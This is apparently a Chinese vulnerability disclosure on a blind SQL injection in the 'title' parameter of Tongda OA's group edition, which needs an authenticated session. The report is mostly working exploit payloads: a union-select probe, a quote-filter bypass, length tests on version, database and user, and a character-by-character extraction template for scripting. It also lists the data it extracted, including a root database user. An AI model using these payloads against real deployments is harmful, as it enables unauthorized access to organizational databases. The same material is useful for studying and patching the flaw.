通达OA集团最新版一处盲注漏洞demo测试（需登录）

### 简要描述： 集团OA最新版，未过滤'，然后再绕过过滤函数，root权限 ### 详细说明： 厂商官网：http://**.**.**.**/ 集团demo地址：**.**.**.**/ SQL漏洞地址： ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1 参数title可注入 ``` 这个点竟然没有过滤单引号' [<img src="https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png" alt="1019-20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183301f5727cc2440b462979be90d3f57056d2.png) 爆SQL语句： 提交： ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and 1=2 union select ``` [<img src="https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png" alt="1019-21.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183439bd3193c3663c2c818b37301dceff7a90.png) 返回： ``` 不安全的SQL语句：联合查询 select count(*) as total from doc_send_data as a where 1 = 1 and title like '%1%' and 1=2 union select%' and status='6' and a.creator='admin' ``` 然后绕过过滤，构造注入 ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(version())=41 and 'a%'='a ``` [<img src="https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png" alt="1019-22.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/19183649c375a7ed001b5496615dc50dc5e49ea7.png) 判断version长度为41 同理判断user、database ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(database())=5 and 'a%'='a ``` ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and length(user())=14 and 'a%'='a ``` 构造盲注点： ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),1,1)),16,10)=116 and 'a%'='a ``` 直接用脚本跑： ``` **.**.**.**/general/document/index.php/send/sendlist/send_for/?tid=&title=1%' and CONV(HEX(SUBSTRING(database(),{1},1)),16,10)={1} and 'a%'='a ``` [<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png) database ``` td_oa ``` [<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png) user ``` root@**.**.**.** ``` [<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png) version ``` 5.5.36-enterprise-commercial-advanced-log ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png" alt="1015-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837437a4cd43b4126a0bbbb71f4825436ca90.png) database ``` td_oa ``` [<img src="https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png" alt="1015-user.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837517ee20a1cbd85ffde73d6e8b3f92288b1.png) user ``` root@**.**.**.** ``` [<img src="https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png" alt="1015-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/191837553275b5c88c22cdc1aa467d9e6ec97f2a.png) version ``` 5.5.36-enterprise-commercial-advanced-log ```